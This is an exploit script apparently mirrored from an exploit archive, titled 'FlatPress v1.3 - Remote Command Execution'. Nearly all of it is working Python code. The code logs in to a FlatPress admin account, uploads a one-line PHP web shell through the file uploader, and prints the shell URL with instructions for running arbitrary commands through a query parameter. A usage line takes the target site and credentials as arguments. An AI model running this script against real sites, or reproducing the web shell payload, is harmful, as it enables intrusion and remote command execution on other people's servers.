Share
## https://sploitus.com/exploit?id=PACKETSTORM:178208
# Exploit Title: FlatPress v1.3 - Remote Command Execution  
# Discovered by: Ahmet Ümit BAYRAM  
# Discovered Date: 19.04.2024  
# Vendor Homepage: https://www.flatpress.org  
# Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip  
# Tested Version: 1.3 (latest)  
# Tested on: MacOS  
  
import requests  
import time  
import random  
import string  
  
def random_string(length=5):  
"""Rastgele bir string oluşturur."""  
letters = string.ascii_lowercase  
return ''.join(random.choice(letters) for i in range(length))  
  
def login_and_upload(base_url, username, password):  
filename = random_string() + ".php"  
login_url = f"http://{base_url}/login.php"  
upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"  
  
with requests.Session() as session:  
# Exploiting  
print("Exploiting...")  
time.sleep(1)  
  
# Giriş yapma denemesi  
login_data = {  
'user': username,  
'pass': password,  
'submit': 'Login'  
}  
print("Logging in...")  
response = session.post(login_url, data=login_data)  
time.sleep(1)  
  
if "Logout" in response.text:  
print("Login Successful!")  
else:  
print("Login Failed!")  
print(response.text)  
return  
  
# Dosya yükleme denemesi  
print("Shell uploading...")  
time.sleep(1)  
  
# Form verileri ve dosyalar  
files = {  
'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),  
}  
form_data = {  
'_wpnonce': '9e0ed04260',  
'_wp_http_referer': '/admin.php?p=uploader',  
'upload': 'Upload'  
}  
  
response = session.post(upload_url, files=files, data=form_data)  
  
if "File(s) uploaded" in response.text or "Upload" in response.text:  
shell_url = f"http://{base_url}/fp-content/attachs/{filename}"  
print(f"Your Shell is Ready: {shell_url}")  
time.sleep(1)  
print(f"Shell Usage: {shell_url}?0=command")  
else:  
print("Exploit Failed!")  
print(response.status_code, response.text)  
  
# Örnek kullanım: python script.py siteadi.com username password  
if __name__ == "__main__":  
import sys  
if len(sys.argv) != 4:  
print("Usage: script.py <base_url> <username> <password>")  
else:  
base_url, username, password = sys.argv[1:]  
login_and_upload(base_url, username, password)